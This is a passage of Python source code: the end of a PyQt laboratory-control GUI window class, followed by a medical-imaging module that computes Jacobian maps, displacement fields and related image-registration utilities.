self.remote_menu.addAction(self.RemoteAction)
self.help = self.menu.addMenu("Help")
self.help.addAction(self.help_action)
self.help.addAction(self.about_action)
self.toolbar = QToolBar("main toolbar")
self.toolbar.setIconSize(QSize(16, 16))
self.addToolBar(self.toolbar)
self.toolbar.addAction(self.NewProjectAction)
self.toolbar.addAction(self.OpenProjectAction)
self.toolbar.addAction(self.CreateNotePadAction)
self.toolbar.addAction(self.NewTextEditorAction)
self.toolbar.addSeparator()
self.toolbar.addAction(self.dark_mode_action)
self.toolbar.addSeparator()
self.project_toolbar = QToolBar("project")
# self.addToolBar(Qt.RightToolBarArea, self.project_toolbar)
self.addToolBar(self.project_toolbar)
self.project_toolbar.setIconSize(QSize(16, 16))
self.project_toolbar.setMovable(False)
self.project_toolbar.addAction(self.CreatNewTableAction)
self.setStatusBar(QStatusBar(self))
self.set_disable_enable_widgets(True)
def sizeHint(self):
return QSize(1080, 650)
def project_manger(self, name):
self.set_disable_enable_widgets(False)
self.project_name = name
self.setWindowTitle(f"RedoX App 2.1 [{name}]")
self.FileTreeViewer.project_name = name
self.FileTreeViewer.new_project_added()
def set_disable_enable_widgets(self, state):
self.remote_menu.setDisabled(state)
self.tools.setDisabled(state)
self.SCPICommandLine.setDisabled(state)
self.CreateNotePadAction.setDisabled(state)
self.FileTreeViewer.setDisabled(state)
self.graph.setDisabled(state)
self.table.setDisabled(state)
self.PumpQWidget.setDisabled(state)
self.CreatNewTableAction.setDisabled(state)
if not state:
self.setCentralWidget(self.mdi)
def add_sub_win(self, obj):
sub = QMdiSubWindow()
sub.setWindowIcon(icon("new_project.png"))
sub.setWidget(obj)
self.mdi.addSubWindow(sub)
sub.show()
def file_opened(self, file):
if file['file_type'] == '.txt':
obj = NotePad()
obj.note_open(file['file_path'], file['file_name'])
self.add_sub_win(obj)
elif file['file_type'] == '.py':
obj = TextEditor()
obj.procedure_open(file['file_path'], file['file_name'])
self.add_sub_win(obj)
elif file['file_type'] == '.png':
obj = GraphViewer(file['file_path'])
self.add_sub_win(obj)
def remote_activated(self):
if self.RemoteManger is None:
try:
self.RemoteManger = RemoteManger()
except Exception as e:
self.error_message(str(e))
if self.RemoteManger is not None:
self.add_sub_win(RemoteControlPanel(self))
self.PumpQWidget.connection_mode_QComboBox.setDisabled(False)
def error_message(self, s):
dlg = QMessageBox(self)
dlg.setText(s)
dlg.setIcon(QMessageBox.Critical)
dlg.show()
if __name__ == "__main__":
app = QApplication(sys.argv) # 1 create the application object
app.setStyle('Fusion') # 2 set the Fusion style
window = MainWindow() # make an instance of the MainWindow class
window.show() # show the window
app.exec_() # lastly, start the event loop
|
displacements.py
|
import math
import os
import re
import sys
import threading
import warnings
from functools import reduce
from glob import glob
from typing import *
import numpy as np
import scipy.interpolate
import SimpleITK as sitk
from disptools import *
import disptools.drawing as drawing
import disptools.io as io
import _disptools
def regularise(jacobian: sitk.Image, epsilon: float = 1e-5) -> sitk.Image:
r""" Regularise the Jacobian, removing singularities.
Given a 3D scalar image, replace all the entries that are smaller
than `epsilon` with `epsilon`.
Parameters
----------
jacobian : sitk.Image
Input Jacobian map
epsilon : float
Lower threshold for the Jacobian.
Returns
-------
sitk.Image
Thresholded Jacobian.
"""
jacobian = sitk.Cast(jacobian, sitk_float_type)
if (3 != len(jacobian.GetSize())):
raise Exception("Wrong jacobian dimensionality")
# Object for the result
result = sitk.Image(jacobian)
# Call function from the underlying C library
_disptools.regularise(sitk.GetArrayViewFromImage(result), epsilon)
return result
def jacobian(field: sitk.Image) -> sitk.Image:
r""" Compute the Jacobian map of a vector field.
Parameters
----------
field : sitk.Image
Input vector field.
Returns
-------
sitk.Image
The Jacobian of the given vector field.
"""
field = sitk.Cast(field, sitk_vector_float_type)
image = sitk.GetArrayViewFromImage(field)
if 4 != len(image.shape) or 3 != image.shape[3]:
raise Exception("Wrong input dimensionality")
# Convert to the library's memory layout
shape = image.shape[0:3]
image_data = np.empty((3, *shape), dtype=np_float_type)
image_data[0,:,:,:] = image[:,:,:,0]
image_data[1,:,:,:] = image[:,:,:,1]
image_data[2,:,:,:] = image[:,:,:,2]
# Object for the result
result = np.zeros(shape, dtype=np_float_type)
# Call function from the underlying C library
_disptools.jacobian(field.GetSpacing(), image_data, result)
result = sitk.GetImageFromArray(result)
result.CopyInformation(field)
return result
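# --- Illustrative sketch (not part of the original module) ---
# Shows the expected memory layout for jacobian(): a 3D vector image with
# three components per voxel. The field here is all zeros (a placeholder);
# real use would pass an actual displacement field.
def _example_jacobian_call(size=(16, 16, 16)):
    data = np.zeros((*size, 3), dtype=np.float32)  # (z, y, x, component)
    field = sitk.GetImageFromArray(data, isVector=True)
    return jacobian(field)                         # scalar sitk.Image of the same size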
# This function wraps the C call.
def _displacement(
image : sitk.Image,
mask : sitk.Image = None,
initial_guess : sitk.Image = None,
epsilon : float = 9.99e-4,
tolerance : float = 0.2,
it_max : int = 50000,
alpha : float = 1.2,
beta : float = 0.5,
gamma : float = .1,
delta : float = 1e-3,
zeta : float = 100.0,
theta : float = 1e-6,
iota : float = 1e-9,
strict : bool = False,
eta : float = 0.1,
eta_max : float = 0.4,
algorithm : str = 'gradient',
gpu_id : int = -1,
):
r""" Compute a displacement field that realises a prescribed Jacobian.
.. note::
This function should not be called directly. Please use its wrapper `displacement`.
Parameters
----------
See the documentation for `displacement`.
Returns
-------
sitk.Image
A displacement field whose Jacobian matches the input.
"""
jacobian = sitk.GetArrayViewFromImage(image).astype(np_float_type, copy=True)
if mask is None:
# Default mask: whole image
mask = np.ones(jacobian.shape, dtype=bool)
else:
# Get mask as numpy array of booleans
mask = sitk.GetArrayViewFromImage(mask).astype(bool, copy=True)
if mask.shape != jacobian.shape:
raise Exception("The shapes of the Jacobian and the mask must agree")
# Create objects for the result, initialise initial guess
if initial_guess is not None:
data = sitk.GetArrayViewFromImage(initial_guess)
if data.shape[0:3] != jacobian.shape:
raise Exception("The shapes of the Jacobian and the initial guess must agree")
field_tmp = np.empty((3, *jacobian.shape), dtype=np_float_type)
field_tmp[0,:,:,:] = data[:,:,:,0]
field_tmp[1,:,:,:] = data[:,:,:,1]
field_tmp[2,:,:,:] = data[:,:,:,2]
else:
field_tmp = np.zeros((3, *jacobian.shape), dtype=np_float_type)
# Arguments
args = [
image.GetSpacing(),
jacobian,
mask,
epsilon,
tolerance,
eta,
eta_max,
alpha,
beta,
gamma,
delta,
zeta,
theta,
iota,
strict,
it_max,
field_tmp,
algorithm,
gpu_id,
]
# Call the function in a separate thread
#
# The thread cannot actually be killed from the REPL while busy, but
# at least this way the REPL can handle SIGINT. Using a process
# instead of a thread would allow to kill the call, but it does not
# work in the REPL, so there is no point.
#
# The real solution would be to put a signal handler inside the C
# routines. There are resources to be freed before interrupting, and
# they are shared between OpenMP threads, so it requires the use of a
# termination flag inside the OpenMP sections.
t = threading.Thread(target=_disptools.displacement, args=args, daemon=True)
t.start()
t.join()
# Convert to ITK's image memory layout
field = np.empty((*jacobian.shape, 3), dtype=np_float_type)
field[:,:,:,0] = field_tmp[0,:,:,:]
field[:,:,:,1] = field_tmp[1,:,:,:]
field[:,:,:,2] = field_tmp[2,:,:,:]
# Convert the result to match the input type
field = sitk.GetImageFromArray(field)
field.CopyInformation(image)
return field
def redistribute_volume_change(image: sitk.Image, mask: sitk.Image) -> sitk.Image:
r""" Redistribute the volume change over the image.
Redistribute the change of volume within the body on the background,
and enforce the total volume change over the entire image to be zero.
Parameters
----------
image : sitk.Image
Input Jacobian.
mask : sitk.Image
Binary mask of the body volume.
Returns
-------
sitk.Image
A new Jacobian map with redistributed volume changes.
"""
data = sitk.GetArrayFromImage(image)
index = sitk.GetArrayViewFromImage(mask)
correction = -(np.sum(data) - data.size) / (data.size - np.count_nonzero(index))
data[index == 0.0] += correction
result = sitk.GetImageFromArray(data)
result.CopyInformation(image)
return result
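# --- Illustrative sketch (not part of the original module) ---
# A typical pipeline with the wrapper `displacement` defined below: read a
# prescribed Jacobian map, regularise it, generate a displacement field, and
# compute the Jacobian actually achieved. File names are placeholders.
def _example_displacement_pipeline(jacobian_file="jacobian.nii.gz", mask_file=None):
    target = regularise(sitk.ReadImage(jacobian_file, sitk_float_type))
    mask = sitk.ReadImage(mask_file, sitk.sitkUInt8) if mask_file else None
    field = displacement(target, mask=mask, levels=3, epsilon=1e-3, it_max=2000)
    achieved = jacobian(field)
    return field, achieved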
# This function is a wrapper of `_displacement()` that adds padding/cropping
# and handles the multi-resolution pyramid.
def displacement(
jacobian : sitk.Image,
*,
levels : int = 1,
pad : int = 0,
redistribute : bool = False,
mask : sitk.Image = None,
initial_guess : sitk.Image = None,
epsilon : float = 9.99e-4,
tolerance : float = 0.2,
it_max : Union[int, List[int]] = 50000,
alpha : float = 1.2,
beta : float = 0.5,
gamma : float = 0.1,
delta : float = 1e-3,
zeta : float = 10.0,
theta : float = 1e-6,
iota : float = 1e-9,
strict : bool = False,
eta : float = 0.1,
eta_max : float = 0.4,
algorithm : str = 'gradient',
gpu_id : int = -1
) -> sitk.Image:
r""" Generate a displacement field that realises a given Jacobian.
Given a 3D scalar image encoding a Jacobian map, compute a
3D vector image encoding a vector field whose Jacobian map
matches the input up to a certain tolerance.
The three algorithms provided are:
* ``gradient``: a gradient descent method (default).
* ``greedy``: a greedy search method based on the method proposed in [1]_.
* ``matching``: a volume matching routine based on gradient descent,
published in [2]_ and [3]_. The implementation comes from
the `atrophysim tool`_.
The initial value of the step length in the gradient descent is
given by the parameter ``eta``. The ``gradient`` and ``matching``
algorithms use an `Armijo condition`_ to control the step length,
in the form
.. math::
E(d - \eta \nabla E(d)) - E(d) \le -\gamma \eta ||\nabla E(d)||^2
where :math:`d` is the displacement, :math:`E` the loss function,
:math:`\eta` the current step length, and :math:`\gamma \in (0, 1)` a
parameter of the condition. At each iteration the step length is increased
by multiplying it by ``alpha``; if the Armijo condition is not met after
the update, ``eta`` is decreased by multiplying it by ``beta`` until the
inequality in the Armijo condition holds again. A maximum
value for ``eta`` can be set through the parameter ``eta_max``.
The ``gradient`` and ``matching`` algorithms have a regularisation term
that penalises values of the Jacobian below a certain threshold, given
by ``delta``. The importance of the regularisation term is controlled
by the parameter ``zeta`` (set to ``0`` to have no regularisation).
Termination is controlled by a condition on the improvement of the result
and one on the step length. If the percentage improvement of the cost
drops below the value given by ``theta``, the algorithm terminates.
Termination also happens if the step length becomes smaller than
``iota``.
.. _atrophysim tool: https://www.nitrc.org/projects/atrophysim
.. _Armijo condition: https://en.wikipedia.org/wiki/Wolfe_conditions
.. note::
The displacement is generally not accurate on image boundary voxels.
.. note::
The C verbose output is written to `stdout`. If you want to capture
it from within Python, the `wurlitzer package`_ might be helpful.
.. warning::
This function calls a C routine which cannot be interrupted from
the REPL.
.. _wurlitzer package: https://github.com/minrk/wurlitzer
References
----------
.. [1] van Eede, M. C., Scholz, J., Chakravarty, M. M., Henkelman, R. M., and Lerch, J. P.
"Mapping registration sensitivity in MR mouse brain images." Neuroimage 82 (2013), 226–236.
.. [2] Karaçali, B., and Davatzikos, C. "Estimating topology preserving and smooth displacement fields."
IEEE Transactions on Medical Imaging 23, 7 (2004), 868–880.
.. [3] Karaçali, B., and Davatzikos, C. "Simulation of tissue atrophy using a topology preserving
transformation model." IEEE transactions on medical imaging 25, 5 (2006), 649–652.
Parameters
----------
jacobian : sitk.Image
Input Jacobian.
levels : int
        Number of levels in the multi-resolution pyramid; the size of
        the image along each direction is halved at each level.
pad : int
Thickness of the zero-padding around the volume (0 for
the mask, 1.0 for the Jacobian) to be used during the
computation. The padding is removed before returning the result.
redistribute : bool
Redistribute the volume change inside the mask to the background.
mask : sitk.Image
Binary mask for the region of interest.
initial_guess : sitk.Image
Initial estimation of the solution. The default is a null
displacement field.
epsilon : float
A floating point value, representing the tolerance per
voxel on the Jacobian of the resulting field.
tolerance : float
Tolerance on Jacobian outside the mask.
it_max : Union[int, List[int]]
Maximum number of iterations allowed. If it is a list, its
length must match the number of levels in the multi-resolution
pyramid, and each value is used for a single level, with the
first element of the list representing the level with lowest
resolution. If it is a scalar, then the same number of
iterations is used for all pyramid levels.
alpha : float
Coefficient that controls the increase of the step length.
beta : float
Coefficient that controls the decrease of the step length.
gamma : float
Armijo-Goldstein parameter.
delta : float
Lower threshold for Jacobian regularisation.
zeta : float
Weight for the regularisation term.
theta : float
Terminate if the percentage improvement of the cost per
iteration drops below this value.
iota : float
Terminate if the step length drops below this value.
strict : bool
        If True, reject iterations that do not decrease the maximum
        voxel error.
eta : float
Initial step length.
eta_max : float
Maximum step length allowed.
algorithm : str
Algorithm to generate the field, one of `greedy`, `gradient`, or `matching`.
gpu_id : int
Id of the CUDA device used to run the GPU implementation. If
equal to `-1`, the CPU implementation is used instead. Requires
a build of disptools with CUDA support enabled.
Returns
-------
sitk.Image
A displacement field whose Jacobian matches the input.
"""
# Filter parameters used locally and parameters propagated to the
# wrapped function
parameters = locals().copy()
used = ['jacobian', 'levels', 'pad', 'redistribute', 'mask',
'initial_guess', 'it_max']
    for p in used:
        parameters.pop(p)
jacobian = sitk.Cast(jacobian, sitk_float_type)
if mask is None:
mask = np.ones(tuple(reversed(jacobian.GetSize())), dtype=np_float_type)
mask = sitk.GetImageFromArray(mask)
mask.CopyInformation(jacobian)
else:
mask = sitk.Cast(mask, sitk_float_type)
size = jacobian.GetSize()
origin = jacobian.GetOrigin()
spacing = jacobian.GetSpacing()
direction = jacobian.GetDirection()
# Ensure consistency of the coordinate system
    def make_consistent(img, name, interpolator):
        if img is None:
            return img
        inconsistent = []
        if img.GetSize() != size:
            inconsistent.append('size')
        if img.GetOrigin() != origin:
            inconsistent.append('origin')
        if img.GetSpacing() != spacing:
            inconsistent.append('spacing')
        if img.GetDirection() != direction:
            inconsistent.append('direction')
        if inconsistent != []:
            inconsistent = ' and '.join(inconsistent)
            warnings.warn("%s of '%s' " % (inconsistent, name) +
                          "inconsistent with the Jacobian, " +
                          "resampling to a common coordinate space")
            if interpolator != sitk.sitkNearestNeighbor:
                img = sitk.SmoothingRecursiveGaussian(img, 2.0)
            return sitk.Resample(img, jacobian, sitk.Transform(), interpolator)
        else:
            return img
mask = make_consistent(mask, 'mask', sitk.sitkNearestNeighbor)
initial_guess = make_consistent(initial_guess, 'initial_guess', sitk.sitkLinear)
# Add a voxel of zero-flux padding anyway since the algorithm
# will not compute the displacement field on boundary voxels
if pad > 0:
pad += 1
else:
pad = 1
pad = ((pad, pad, pad), (pad, pad, pad))
if redistribute:
jacobian = redistribute_volume_change(jacobian, mask)
mask = sitk.ConstantPad(mask, *pad, 0)
jacobian = sitk.ZeroFluxNeumannPad(jacobian, *pad)
# Create image pyramid
jacobian_pyramid = [jacobian]
mask_pyramid = [mask]
for i in range(1, levels):
new_size = tuple(map(lambda x: x // 2, jacobian_pyramid[i-1].GetSize()))
jacobian_pyramid.append(drawing.scale_image(jacobian, new_size))
mask_pyramid.append(drawing.scale_image(mask, new_size, sitk.sitkNearestNeighbor))
# Set maximum number of iterations for each pyramid level
if not isinstance(it_max, list):
it_max = [it_max for i in range(levels)]
elif len(it_max) != levels:
raise ValueError('len(it_max) should equal the value of `levels`')
# Set initial guess
field = initial_guess
# Multi-resolution algorithm
for jacobian, mask, it in zip(jacobian_pyramid[::-1], mask_pyramid[::-1], it_max):
size = jacobian.GetSize()
logging.info('Size %s' % str(size))
field = drawing.scale_image(field, size) if field is not None else None
field = _displacement(jacobian, mask, initial_guess=field, it_max=it, **parameters)
# Remove padding from the result
field = sitk.Crop(field, *pad)
field.SetOrigin(origin)
field.SetSpacing(spacing)
field.SetDirection(direction)
return field
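# Usage sketch (not part of the original module): how `displacement` might be
# called on a synthetic Jacobian. The image size, number of levels and iteration
# counts below are illustrative assumptions, not recommended defaults; see the
# docstring above for the meaning of each keyword.
def _example_displacement_usage():
    # Toy Jacobian with a mild expansion in the centre of a 32^3 volume.
    jac = np.ones((32, 32, 32), dtype=np_float_type)
    jac[12:20, 12:20, 12:20] = 1.2
    jac = sitk.GetImageFromArray(jac)
    # Two pyramid levels; the first it_max entry applies to the coarsest level.
    field = displacement(jac, levels=2, epsilon=1e-3, it_max=[1000, 2000])
    return field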
def average_jacobian_from_displacements(input_filenames_pattern: str, epsilon: float = 1e-5) -> sitk.Image:
r""" Compute the average Jacobian of a set of displacement fields.
This function reads a collection of displacement fields from files
(``rvf`` or any other format readable by SimpleITK) and computes
the average Jacobian of the deformation associated to them
(defined as the geometric mean computed under logarithm).
It accepts a string argument containing a `glob pattern`_ to the
input displacement files, and a second optional argument setting
a minimum threshold for the Jacobian.
For instance, assuming there is a folder ``/home/user/my_displacements``
containing a set of displacement fields in ``vtk`` format, the average
Jacobian can be computed with
>>> average_jacobian = disptools.displacements.average_jacobian_from_displacements('/home/user/my_jacobians/*.vtk')
The average Jacobian is defined as the geometric mean computed under
logarithm.
.. _glob pattern: https://en.wikipedia.org/wiki/Glob_(programming)
Parameters
----------
input_filenames_pattern : str
A glob pattern for the displacement files in RVF or another
format readable by SimpleITK.
epsilon : float
Minimum threshold for the Jacobian, all values below `epsilon`
will be replaced with `epsilon`.
Returns
-------
sitk.Image
The average Jacobian of the given displacements.
"""
total_jacobian = None
filenames = glob('%s' % input_filenames_pattern)
n = len(filenames)
logging.debug('Files to process: %d' % n)
logging.debug('Starting')
i = 1
for f in filenames:
logging.debug('Processing file %3d/%d %s' % (i, n, f))
try:
file_format = re.match(r'.*\.([^.]+)$', f).group(1)
        except AttributeError:
            logging.debug('Skipping file %s' % f)
continue
if file_format == 'rvf':
I = io.read_rvf(f)
else:
I = sitk.ReadImage(f)
J = jacobian(I)
J = regularise(J, epsilon)
if total_jacobian is None:
total_jacobian = np.zeros(tuple(reversed(I.GetSize())), dtype=np_float_type)
total_jacobian += np.log(sitk.GetArrayViewFromImage(J))
i += 1
average_jacobian = np.exp(1.0/n * total_jacobian)
output_jacobian = sitk.GetImageFromArray(average_jacobian)
output_jacobian.CopyInformation(I)
return output_jacobian
def average_jacobian(input_filenames_pattern: str, epsilon: float = 1e-5) -> sitk.Image:
r""" Compute the average of a set of Jacobians.
This function reads a collection of Jacobian maps from files (any format
readable by SimpleITK) and computes their average Jacobian (defined as the
geometric mean computed under logarithm). It accepts a string argument
containing a `glob pattern`_ to the input files, and a second optional
argument setting a minimum threshold for the Jacobian.
For instance, assuming there is a folder ``/home/user/my_jacobians``
containing a set of Jacobian maps in ``vtk`` format, the average can
be computed with
>>> average_jacobian = disptools.displacements.average_jacobian('/home/user/my_jacobians/*.vtk')
The average Jacobian is defined as the geometric mean computed under
logarithm.
.. _glob pattern: https://en.wikipedia.org/wiki/Glob_(programming)
Parameters
----------
input_filenames_pattern : str
A glob pattern for the displacement files in a format
readable by SimpleITK.
epsilon : float
A lower threshold for the Jacobian, all values below `epsilon`
will be replaced with `epsilon`.
Returns
-------
sitk.Image
The geometric mean of the input Jacobian maps.
"""
total_jacobian = None
filenames = glob('%s' % input_filenames_pattern)
n = len(filenames)
logging.debug('Files to process: %d' % n)
logging.debug('Starting')
i = 1
for f in filenames:
logging.debug('Processing file %3d/%d %s' % (i, n, f))
image = sitk.Cast(sitk.ReadImage(f), sitk_float_type)
image = sitk.Threshold(image, lower=epsilon, upper=1e9, outsideValue=epsilon)
jacobian = sitk.GetArrayFromImage(image)
if total_jacobian is None:
total_jacobian = np.zeros(jacobian.shape, dtype=jacobian.dtype)
total_jacobian += np.log(jacobian)
i += 1
average_jacobian = np.exp(1.0/n * total_jacobian)
output_jacobian = sitk.GetImageFromArray(average_jacobian)
output_jacobian.CopyInformation(image)
return output_jacobian
def jacobian_to_volume_change(jacobian: sitk.Image, epsilon: float = 1e-5) -> sitk.Image:
r""" Convert a Jacobian map to a volume change map.
A volume change map is defined as
.. math::
VC[f](x) =
\begin{cases}
1 - \frac{1}{J[f](x)} \quad &J[f](x) \in (0,1) \\
J[f](x) - 1 \quad &J[f](x) \ge 1
\end{cases}
Parameters
----------
jacobian : sitk.Image
Input Jacobian map.
epsilon : float
Lower threshold for the Jacobian; any value below
`epsilon` will be replaced with `epsilon`.
Returns
-------
sitk.Image
Volume change map associated to the input Jacobian.
"""
data = sitk.GetArrayFromImage(jacobian)
processed = np.empty(data.shape, dtype=data.dtype)
ind_expa = data >= 1.0
ind_comp = data < 1.0
ind_sing = data <= epsilon
data[ind_sing] = epsilon
processed[ind_expa] = data[ind_expa] - 1.0
processed[ind_comp] = 1.0 - (1.0 / data[ind_comp])
result = sitk.GetImageFromArray(processed)
result.CopyInformation(jacobian)
return result
def volume_change_to_jacobian(volume_change: sitk.Image) -> sitk.Image:
r""" Convert a volume change map to a Jacobian map.
A volume change map is defined as
.. math::
VC[f](x) =
\begin{cases}
1 - \frac{1}{J[f](x)} \quad &J[f](x) \in (0,1) \\
J[f](x) - 1 \quad &J[f](x) \ge 1
\end{cases}
Parameters
----------
volume_change : sitk.Image
Input volume change map.
Returns
-------
sitk.Image
A Jacobian map associated to the input volume changes.
"""
data = sitk.GetArrayViewFromImage(volume_change)
processed = np.empty(data.shape, dtype=data.dtype)
ind_expa = data >= 0.0
ind_comp = data < 0.0
processed[ind_expa] = data[ind_expa] + 1.0
processed[ind_comp] = -1.0 / (data[ind_comp] - 1.0)
result = sitk.GetImageFromArray(processed)
result.CopyInformation(volume_change)
return result
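# Round-trip sketch (illustrative, not part of the original module): converting
# a Jacobian map to a volume change map and back recovers the input, since the
# two mappings above are inverse of each other for values above `epsilon`.
def _example_volume_change_round_trip():
    jac = np.array([[[0.5, 1.0], [1.5, 2.0]]], dtype=np_float_type)
    jac_img = sitk.GetImageFromArray(jac)
    vc = jacobian_to_volume_change(jac_img)    # 0.5 -> -1.0, 2.0 -> 1.0
    jac_back = volume_change_to_jacobian(vc)
    assert np.allclose(sitk.GetArrayViewFromImage(jac_back), jac)
    return jac_back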
def deformation_to_displacement(deformation: sitk.Image) -> sitk.Image:
r""" Convert a deformation field to a displacement field.
A deformation field :math:`D` is given by the sum of the identity
transform and a displacement field :math:`d`:
.. math::
D(x) = x + d(x)
Parameters
----------
    deformation : sitk.Image
Input deformation field.
Returns
-------
sitk.Image
Displacement field associated to the deformation.
"""
a = sitk.GetArrayFromImage(deformation)
for x, y, z in np.ndindex(deformation.GetSize()):
a[z,y,x,0] -= x
a[z,y,x,1] -= y
a[z,y,x,2] -= z
    displacement = sitk.GetImageFromArray(a, isVector=True)
displacement.CopyInformation(deformation)
return displacement
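# Minimal sketch (assumed example, not from the original module): the identity
# deformation D(x) = x maps to a null displacement field. The grid size below
# is arbitrary.
def _example_deformation_to_displacement():
    nx, ny, nz = 4, 3, 2
    a = np.zeros((nz, ny, nx, 3), dtype=np_float_type)
    for x, y, z in np.ndindex(nx, ny, nz):
        a[z, y, x, :] = (x, y, z)
    deformation = sitk.GetImageFromArray(a, isVector=True)
    d = deformation_to_displacement(deformation)
    assert np.allclose(sitk.GetArrayViewFromImage(d), 0.0)
    return d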
def compose_displacements(*fields: sitk.Image) -> sitk.Image:
r""" Compose multiple displacement fields.
Compute the composition pairwise and iteratively. For a couple
of displacements :math:`d_1` and :math:`d_2`
associated to the transforms :math:`f_1` and :math:`f_2`, the
composition
.. math::
(f_2 \circ f_1) (x) = f_2(f_1(x))
is obtained by resampling :math:`d_2` with :math:`d_1` and then
summing.
Parameters
----------
fields : sitk.Image
Variadic list of displacement fields.
Returns
-------
sitk.Image
The composition of the input displacement fields.
"""
fields = list(fields)
total_field = sitk.Image(fields.pop(0))
for field in fields:
resampled_field = sitk.Warp(field,
total_field,
outputSize=total_field.GetSize(),
outputSpacing=total_field.GetSpacing(),
outputOrigin=total_field.GetOrigin(),
outputDirection=total_field.GetDirection())
resampled_field.CopyInformation(total_field)
total_field = sitk.Add(total_field, resampled_field)
return total_field
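# Sketch (assumed example, not part of the original module): composing two
# constant translations gives, away from the image boundary, their sum; boundary
# voxels may differ because of the padding used by the resampling.
def _example_compose_displacements():
    shape = (8, 8, 8, 3)
    d1 = sitk.GetImageFromArray(np.full(shape, 1.0, dtype=np_float_type), isVector=True)
    d2 = sitk.GetImageFromArray(np.full(shape, 2.0, dtype=np_float_type), isVector=True)
    total = compose_displacements(d1, d2)
    centre = sitk.GetArrayViewFromImage(total)[4, 4, 4, :]
    assert np.allclose(centre, 3.0)
    return total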
def decompose_displacements(
field1: sitk.Image,
field2: sitk.Image
) -> sitk.Image:
r""" Decompose two displacement fields.
Given two displacement fields :math:`d_1` and :math:`d_2`
associated to the transforms :math:`f_1` and :math:`f_2`,
find a third displacement :math:`d_3` associated to the
transform :math:`f_3`, such that
.. math::
f_1 &= f_3 \circ f_2 \\
d_1(x) &= d_2(x) + d_3(d_2(x))
Parameters
----------
field1 : sitk.Image
Total displacement.
field2 : sitk.Image
Component to be decomposed from the total displacement.
Returns
-------
sitk.Image
A vector image representing a displacement field such
that its composition with the second argument gives
the first argument.
"""
field3 = sitk.Warp(field1 - field2,
sitk.InvertDisplacementField(field2),
outputSize=field1.GetSize(),
outputSpacing=field1.GetSpacing(),
outputOrigin=field1.GetOrigin(),
outputDirection=field1.GetDirection())
field3.CopyInformation(field1)
return field3
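# Sketch (assumed example): decomposing a constant displacement d1 into a known
# component d2 leaves, away from the boundary, approximately d1 - d2 (the field
# inversion is iterative, hence the tolerance).
def _example_decompose_displacements():
    shape = (8, 8, 8, 3)
    d1 = sitk.GetImageFromArray(np.full(shape, 3.0, dtype=np_float_type), isVector=True)
    d2 = sitk.GetImageFromArray(np.full(shape, 1.0, dtype=np_float_type), isVector=True)
    d3 = decompose_displacements(d1, d2)
    centre = sitk.GetArrayViewFromImage(d3)[4, 4, 4, :]
    assert np.allclose(centre, 2.0, atol=1e-2)
    return d3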
def field_zero_padding(
field : sitk.Image,
size_x : Tuple[int,int] = (1,1),
size_y : Tuple[int,int] = (1,1),
size_z : Tuple[int,int] = (1,1)
) -> sitk.Image:
r""" Add a zero padding to a vector field.
Set the zero padding manually, since `sitk.ConstantPad()` does not
support vector images.
Parameters
----------
field : sitk.Image
Input vector field.
size_x : (int, int)
Amount of padding at the beginning and end of x direction.
size_y : (int, int)
Amount of padding at the beginning and end of y direction.
size_z : (int, int)
Amount of padding at the beginning and end of z direction.
Returns
-------
sitk.Image
A padded vector field.
"""
a = np.lib.pad(sitk.GetArrayViewFromImage(field),
(size_x, size_y, size_z, (0,0)),
'constant',
constant_values=0.0)
field_pad = sitk.GetImageFromArray(a)
field_pad.SetSpacing(field.GetSpacing())
field_pad.SetOrigin(field.GetOrigin())
field_pad.SetDirection(field.GetDirection())
return field_pad
def invert_displacement_padded(field: sitk.Image) -> sitk.Image:
r""" Invert a displacement field using one voxel of padding in the computation.
Parameters
----------
field : sitk.Image
Input displacement field.
Returns
-------
sitk.Image
The inverse of the displacement, computed under padding.
"""
inverse = sitk.InvertDisplacementField(field_zero_padding(field))
inverse = sitk.Crop(inverse, (1,1,1), (1,1,1))
inverse.CopyInformation(field)
return inverse
def warp_points_by_displacement(
points : np.ndarray,
displacement : sitk.Image
) -> np.ndarray:
r""" Warp a set of Elastix points by a displacement field.
Parameters
----------
points : np.ndarray
A :math:`n \times m` array representing :math:`n` points
with :math:`m` components.
displacement : sitk.Image
Displacement field.
Returns
-------
np.ndarray
An array representing the warped points.
"""
data = sitk.GetArrayViewFromImage(displacement)
(ox, oy, oz) = displacement.GetOrigin()
(nx, ny, nz) = displacement.GetSize()
(sx, sy, sz) = displacement.GetSpacing()
    # Physical coordinates of the sampling grid: origin + index * spacing
    x = np.linspace(ox, ox + (nx-1) * sx, nx)
    y = np.linspace(oy, oy + (ny-1) * sy, ny)
    z = np.linspace(oz, oz + (nz-1) * sz, nz)
# NOTE: ITK images are indexed as [z,y,x]
f = scipy.interpolate.RegularGridInterpolator((z, y, x),
data,
bounds_error=False)
p = np.empty(points.shape)
p[:,0] = points[:,2]
p[:,1] = points[:,1]
p[:,2] = points[:,0]
return points + f(p)
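# Sketch (assumed example): with a constant displacement of (1, 2, 3) in physical
# units and default origin/spacing, every point is shifted by that vector.
def _example_warp_points_by_displacement():
    a = np.zeros((5, 5, 5, 3), dtype=np_float_type)
    a[..., 0], a[..., 1], a[..., 2] = 1.0, 2.0, 3.0
    d = sitk.GetImageFromArray(a, isVector=True)
    points = np.array([[1.0, 1.0, 1.0], [2.0, 3.0, 1.0]])
    warped = warp_points_by_displacement(points, d)
    assert np.allclose(warped, points + np.array([1.0, 2.0, 3.0]))
    return warped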
def inverse_consistency_error(
forward : sitk.Image,
backward : sitk.Image,
mask : sitk.Image = None
) -> Tuple[sitk.Image, float, float]:
r""" Compute the inverse consistency error (ICE).
Parameters
----------
forward : sitk.Image
A displacement from the registration (maps from
reference space to moving image space).
backward : sitk.Image
A displacement from the inverse registration (maps
from moving image space to reference space)
mask : sitk.Image
ROI in the reference image space
Returns
-------
sitk.Image
Map of the average inverse consistency error magnitude.
float
Average inverse consistency error.
float
Maximum inverse consistency error.
"""
composition = compose_displacements(forward, backward)
if mask is not None:
composition = sitk.Mask(composition, mask > 0)
n = np.sum(sitk.GetArrayViewFromImage(mask) > 0)
else:
n = reduce(int.__mul__, forward.GetSize())
vme = np.linalg.norm(sitk.GetArrayViewFromImage(composition), axis=3)
ic = sitk.GetImageFromArray(vme)
ic.CopyInformation(forward)
aic = np.sum(vme) / n
mic = np.max(vme)
return ic, aic, mic
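# Sketch (assumed example): for a constant translation and its exact inverse the
# inverse consistency error vanishes away from the image boundary; boundary
# voxels are affected by the padding used when resampling.
def _example_inverse_consistency_error():
    shape = (8, 8, 8, 3)
    forward = sitk.GetImageFromArray(np.full(shape, 1.0, dtype=np_float_type), isVector=True)
    backward = sitk.GetImageFromArray(np.full(shape, -1.0, dtype=np_float_type), isVector=True)
    ice_map, average_ice, maximum_ice = inverse_consistency_error(forward, backward)
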